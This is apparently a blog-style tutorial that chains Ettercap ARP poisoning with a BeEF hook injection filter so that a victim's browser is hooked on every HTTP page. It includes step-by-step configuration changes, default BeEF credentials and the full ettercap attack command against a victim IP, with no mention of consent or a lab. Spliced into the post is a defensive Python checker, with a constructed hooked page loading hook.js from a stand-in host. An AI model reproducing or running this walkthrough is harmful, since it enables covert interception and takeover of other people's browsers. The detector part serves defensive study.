BeEF + Ettercap: Pwning Marriage

Aug 4, 2014 11:54 AM

This is the best how-to website that I've ever seen, and I wanted to join it. It taught me a lot, but since I'm here to learn too, please correct me if I'm wrong.

You probably know that Ettercap is a very powerful tool for man in the middle attacks.

You probably know that Browser Exploitation Framework (BeEF) is a very powerful tool for browser exploitation.

But do you know how powerful they are... together?

This is my first how-to, so I wanted to start with something impressive, but easy to explain.

The same goes for this attack: easy and fast, and also easy to automate with a few lines of bash script.

The point of this how-to is to demonstrate how to use an Ettercap filter to inject a BeEF hook, so that every time the victim opens a browser, his/her computer is automatically hooked into BeEF, wherever he/she browses.

To follow this tutorial you need Kali Linux.

Note: this won't work over HTTPS; you'd need SSLstrip for that.

Step 1: Setup Ettercap

We first need to make some changes to the Ettercap configuration file. To work properly, Ettercap needs root access.

In the terminal, type: vi /etc/ettercap/etter.conf

[screenshot: opening etter.conf]

This should be the output:

[screenshot: etter.conf in vi]

Press i to edit the file.

Change ec_uid = 65534 to ec_uid = 0 and ec_gid = 65534 to ec_gid = 0 (as shown in the picture).

Then scroll down and find this:

[screenshot: the lines to change]

Edit to this (uncomment last two lines):

[screenshot: the same lines after editing]

To exit the editor, press Esc, then type :wq to save and quit.

Ettercap is ready.

Step 2: Setup BeEF

To set up BeEF, type in the terminal: cd /usr/share/beef-xss, then ./beef.

This should be the output:

[screenshot: ./beef output]

(The error you see is related to a Metasploit link I set up; you won't see it.)

You can now open Iceweasel and type in the URL bar: http://127.0.0.1:3000/ui/panel and log in with the default username beef and default password beef.

You should see the following:

[screenshot: BeEF control panel]

BeEF is ready.

Step 3: Create the Ettercap Filter

Open Leafpad, or the text editor you prefer, and write:

[screenshot: contents of the filter file]

MACHINEIP is your machine's IP address; you can find it with the command ifconfig, or in the ./beef output, which prints the complete hook URL.

The filter tells Ettercap that whenever it captures a TCP packet coming from port 80, it has to forward the packet on within the ARP poisoning context, but edited.

Save as beefhook.filter.

In the terminal, navigate to the folder containing beefhook.filter; for example, if the .filter is on the Desktop:

cd /root/Desktop

then type:

etterfilter beefhook.filter

This should be the output:

[screenshot: etterfilter output]

As you can see, a new file has been created: filter.ef.

That's the Ettercap filter.

Step 4: Start Ettercap and Load the Filter

To inject the filter into the victim's browser sessions, I'm going to use Ettercap's text interface, because it is faster; the Ettercap GUI is better if your goal is to sniff packets.

In the terminal, type:

ettercap -T -q -F FILTERPATH -M ARP /VICTIMIP/ //

In our case:

ettercap -T -q -F /root/Desktop/filter.ef -M ARP /192.168.1.xxx/ //

[screenshot: ettercap starting]

-T: starts the text interface.

-q: quiet; doesn't show packet contents.

-F: loads the filter at the given path.

-M: attack type (ARP in this case).

/VICTIMIP/ //: the targets; the first group is the victim, the second is left empty, which means every other host.

[screenshot: ettercap running with the filter loaded]

Now every time our victim goes to an HTTP site, the filter injects the hook.

There are only two problems:

  1. If a web page uses <HEAD> instead of <head>, just copy the last if statement of the filter and paste it underneath, replacing head with HEAD.
  2. Sometimes it can fail; for example, it doesn't seem to work well in a virtual machine, which is why I recommend installing Kali Linux as a dual boot or on a live USB.
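From the defender's side, this is an added example (not code from the original post): a small Python checker that flags the traces this kind of injection leaves in an HTTP response, namely a script tag placed directly after <head> or <HEAD>, a script fetched from a host other than the one that served the page, and a Content-Length header that no longer matches the body, since the filter rewrites the payload but not the header. The hook path /hook.js, port 3000 and the address 192.0.2.10 are assumptions (BeEF defaults and a documentation address), and the sample responses are constructed.

```python
import re
from urllib.parse import urlparse

# Port 3000 and /hook.js are BeEF defaults and are assumptions here, not values
# taken from the post above.
SCRIPT_RE = re.compile(rb'<script[^>]*\bsrc=["\']([^"\']+)["\']', re.IGNORECASE)
HEAD_THEN_SCRIPT_RE = re.compile(rb'<head(?:\s[^>]*)?>\s*<script', re.IGNORECASE)


def parse_response(raw: bytes):
    """Split a raw HTTP/1.1 response into a header dict and the body bytes."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def inspect_response(raw: bytes, origin_host: str) -> list:
    """Return findings for one HTTP response that origin_host served."""
    headers, body = parse_response(raw)
    findings = []
    declared = headers.get(b"content-length")
    # A replace() filter lengthens the body but leaves the original header.
    if declared is not None and int(declared) != len(body):
        findings.append(f"content-length mismatch: header {int(declared)}, body {len(body)}")
    if HEAD_THEN_SCRIPT_RE.search(body):
        findings.append("script tag directly after <head>")
    for match in SCRIPT_RE.finditer(body):
        src = match.group(1).decode(errors="replace")
        url = urlparse(src)
        if url.hostname and url.hostname != origin_host:
            findings.append(f"script loaded from another host: {src}")
        if url.port == 3000 or url.path.endswith("/hook.js"):
            findings.append(f"BeEF hook indicator: {src}")
    return findings


def build_response(body: bytes, declared_length: int) -> bytes:
    """Constructed sample response; declared_length may deliberately be stale."""
    return (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: "
            + str(declared_length).encode() + b"\r\n\r\n" + body)


CLEAN_BODY = b"<html><head><title>Shop</title></head><body>ok</body></html>"
# Same page after injection (constructed); the header still carries the clean length.
HOOKED_BODY = (b'<html><HEAD><script src="http://192.0.2.10:3000/hook.js"></script>'
               b'<title>Shop</title></HEAD><body>ok</body></html>')
CLEAN_RESPONSE = build_response(CLEAN_BODY, len(CLEAN_BODY))
HOOKED_RESPONSE = build_response(HOOKED_BODY, len(CLEAN_BODY))
```

Running inspect_response over the two samples returns no findings for the clean page and four for the hooked one; in practice the checker would be fed responses from a capture on the victim's side.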

I hope this post will be useful, thank you for reading.

Post in the comments about errors or mistakes I made.

Sorry for any grammar errors, but I'm not a native speaker.
